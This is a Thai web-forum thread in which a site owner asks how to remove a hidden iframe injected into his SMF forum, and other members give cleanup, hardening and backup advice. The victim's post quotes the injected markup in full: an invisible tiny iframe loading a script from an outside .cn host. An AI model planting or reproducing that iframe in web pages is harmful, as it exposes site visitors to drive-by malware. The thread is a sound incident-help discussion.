[SMF]โดนแอบฝัง ifram เอาออกยังไงอ่ะ ?

[picharnan]

ผมโดนแอบฝัน ifram ใน smf ครับ

โค้ด เลือก ขยาย

<iframe src="http://hugebest.cn:8080/ts/in.cgi?pepsi8" width=2 height=4 style="visibility: hidden"></iframe>

อยากทราบว่ามันอยู่ที่ไดบ้างอ่ะจะตามไปลบมานนน

[ol3omlo]

ถ้ายังไม่ได้ตกแต่งอะไร วิธีแบบ เด็กๆนะ

copy ไฟล์ที่เป็น เวอร์ชั่นเดียวกัน ลงทับไปเลย ไม่ต้องติดตั้งนะ
เชื่อม SQL เข้าตัวเก่าแค่นี่ก็ได้ละ

[picharnan]

ถ้ายังไม่ได้ตกแต่งอะไร วิธีแบบ เด็กๆนะ

copy ไฟล์ที่เป็น เวอร์ชั่นเดียวกัน ลงทับไปเลย ไม่ต้องติดตั้งนะ
เชื่อม SQL เข้าตัวเก่าแค่นี่ก็ได้ละ

พอดีว่าผมแก้ไปเยอะแล้วอ่ะดิครับ

[ol3omlo]

พอดีว่าผมแก้ไปเยอะแล้วอ่ะดิครับ

JOB IN


ช่วงนี้ผมก็ระวังเหมือนกันครับ backup ทั้ง SQL และไฟล์ทุกชนิดเลยละ กันไว้ดีกว่าแก้ ^^

[zZzZ]

เอ เดจาวู ตะกี้เพิ่งตอบกระทู้เวบโดนไวรัสไป สงสัยช่วงนี้แฮคเกอร์มันฟิต - -
ดูไฟล์ .php .js .htm .html แล้วก็ในโฟลเดอร์ /image
ก่อนนะครับ ไล่ดูเลยว่าไฟล์ไหนติดบ้างแล้วเอาโค๊ดซ่อนออก

แล้วก็ดูชื่อไฟล์แปลกๆ (หากใช้ opensource คงลำบากหน่อย เพราะเราไม่รู้ว่าจริงๆควรมีไฟล์อะไรมั่ง -_-')
วิธีการของแฮคเกอร์คือ

พยายามเข้าสู่โฮส โดย
1 หาช่องโหว่ของโฮส อันนี้เลือกโฮสดีๆเขาจะระวังให้เรา หรือถ้าทำโฮสเอง ต้องคอยอัพเดต port / software ต่างๆในเครื่องดีๆ ลองใช้ nessus รันดูก้อได้ครับ ว่าโฮสเรามีรูตรงไหนมั่ง
2 ใช้โทรจัน อันนี้ก็ว่าง่ายๆคือหาทางดักพาส ftp นั่นแหล่ะ ดังนั้น - ระวังเรื่องการใช้โปรแกรมฟรี สคริปฟรี มักมีแถมการดักพาสมาด้วย
3 sniff อันนี้ก็พยายามกันด้วยการใช้โปรโตคอลที่ปลอดภัย เช่น shttp sftp ถ้าเป็นไปได้
4 หาช่องโหว่ของสคริป ดาต้าเบส ก็เช่นเดียวกับ 1.1 อัพเดตเข้า สคริปทั้งหลายที่ใช้ๆอยู่
5 brute force password ว่าง่ายๆ เดาพาสไปเรื่อยๆนั่นแหล่ะ จนถูก
6 นึกไม่ออก ไว้นึกออกจะมาเติม

พอมันเข้าโฮสเรามาก็มักจะรันสคริป แจกไวรัสใส่โฮส หรือแอบฝังอะไรไว้สักอย่าง วันหลังจะได้มาใหม่
เช่น file manager -_-' หรือ เล่นง่ายคือ ทำ online mkt บนโฮสเราซะเลย หึหึ

วิธีป้องกัน
1 หากเป็นโฮสของเรา ปิดของที่ไม่ใช้ service ต่างๆที่ไม่กะจะใช้ก็ปิดๆไป หากเช่าโฮส ก็หาผู้ให้บริการที่ดูดีหน่อย
2 อย่ารันโปรแกรม ftp / script หากไม่มั่นใจแหล่งที่มา
3 เปลี่ยนพาส เรื่อยๆ และพาสควรตั้งให้ strong เช่น Nxjas23%77s ทำนองนี้ (เอาให้จำได้ด้วยนะ)
4 ถ้าเขียนสคริปเอง เวลาใช้ตัวแปร session หรือคกกี้ ให้ศึกษาเรื่องการขโมย session / cookie ด้วยนะครับ ไม่งั้นโดนขึ้นมาไม่รู้ด้วย
5 ถ้ามีดาต้าเบส และเขียนสคริปเอง ให้ระวังเรื่อง sql injection
6 javascript จะใช้ก็ได้ แต่ระวัง java script injection
7 folder permission จะใช้ 777 กับส่วนไหนก็นึกดีๆครับ
8 คอยสังเกตวันที่เราแก้ไขไฟล์ บางทีเราไม่ได้ทำอะไรแต่ไฟล์ดันอัพเดต เข้าไปดูได้เลย อาจมีคนมาช่วยอัพเดตให้คุณแล้ว

วิธีแก้ไข
1. เข้า maintenance mode ถ้ามี หรือพยายามให้ไม่มีการคลิกหน้าเวบเราขณะแก้ไข
2. ใช้สคริปเอาไวรัสออก (เห็นมีคนไทยเขียนๆอยู่ แต่จำไม่ได้ว่าเวบไหน - -) หรือเราเอาออกเองเลย โดยการไล่หาไฟล์ .php .htm .html .js ว่าง่ายๆคือไฟล์อะไรที่รันได้ จะเป็นเป้าหมายของ hacker อ่ะครับ นั่งไล่หาแล้วเอาโค๊ดออกให้หมด
3. อย่าไว้ใจแค่ว่าเอาออกหมดแล้ว ให้ดูในโฟลเดอร์ที่ไม่น่าจะมีไฟล์ที่รันได้อยู่ด้วย เช่น /image บางทีพี่แฮคเกอร์เขาก็ไปสร้างไฟล์แอบไว้ในนั้นเหมือนกัน - -

recovery
เขียนสคริป เพื่อทำ auto recovery แบบง่ายๆเช่น ตรวจวันที่ ตรวจ size แล้วเอา source มาทับ อันนี้ตัวใครตัวมันครับ คงต้องเขียนเอง

[picharnan]

ขอบคุณมากครับ +Thx เลยจ้าา

อิอิ